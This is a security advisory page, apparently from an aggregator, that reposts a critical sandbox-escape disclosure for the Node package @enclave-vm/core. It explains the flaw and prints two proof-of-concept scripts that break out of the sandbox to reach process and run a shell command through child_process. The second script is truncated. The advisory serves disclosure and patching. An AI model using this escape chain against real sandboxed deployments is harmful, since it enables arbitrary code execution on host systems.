CSIRTS // UNIFIED SECURITY ADVISORY FEEDSYS ● ONLINE · POWERED BY INTELFUSIONS.COM

GHSA-f229-3862-4942: @enclave-vm/core is vulnerable to Sandbox Escape

criticalCVSS 10CVE-2026-27597
Summary It is possible to escape the security boundraries set by @enclave-vm/core, which can be used to achieve remote code execution (RCE). The issue has been fixed in version 2.11.1. Details It is possible to obtain the native Object constructor (instead of the SafeObject wrapper). This can be used to get retrieve property descriptors via Object.getOwnPropertyDescriptors, allowing access to properties otherwise restricted by the sandbox. When a memory limit is set (which is the default), __host_memory_track, a host object, can be used to escape via the host function constructor. When this is not the case, a host reference can be obtained via Node's nodejs.util.inspect.custom symbol (which can be triggered, for example, through console.log). Proof of Concept PoC 1 const { Enclave } = require("@enclave-vm/core"); const enclave = new Enclave({ securityLevel: "SECURE", toolHandler: () => {}, }); const result = enclave.run(` const op = {}[["proto"]]; const ho = op[["constructor"]]; const glob = ho.getOwnPropertyDescriptors(this); return { res: glob.host_memory_track__.value[["constructor"]]("return process")() .getBuiltinModule("child_process") .execSync("id") .toString() .split("\\n"), };`); result .then((v) => console.log("success", v)) .catch((e) => console.log("failure", e)); PoC 2 const { Enclave } = require("@enclave-vm/core"); const enclave = new Enclave({ securityLevel: "STRICT", toolHandler: () => {}, memoryLimit: 0, }); const result = enclave.run(` const op = {}[['proto']]; const ho = op[['constructor']]; const glob = ho.getOwnPropertyDescriptors(this); const sym = glob[['Symbol']].value.for('nodejs.util.inspect.custom'); let result; const obj = { [sym]: (depth, option, inspect) => { result = inspect[['constructor']] [['constructor']]('return process')() .getBuiltinModule('child_process') .execSync('id')

Details

Source
GitHub Security Advisories (INTL · database · site)
Severity
critical — CVSS 10
Published
2026-02-25
Last updated
2026-07-06
Exploitation
Not in CISA KEV at last sync

Original advisory: https://github.com/advisories/GHSA-f229-3862-4942

Exploitation outlook

EPSS (FIRST.org) estimates each CVE’s probability of exploitation in the next 30 days — here is the CSIRTS.com read on those numbers.

Referenced CVEs

CVECSIRTS overviewExternal
CVE-2026-27597coverage & exploitation statusNVD · CVE.org

More from GitHub Security Advisories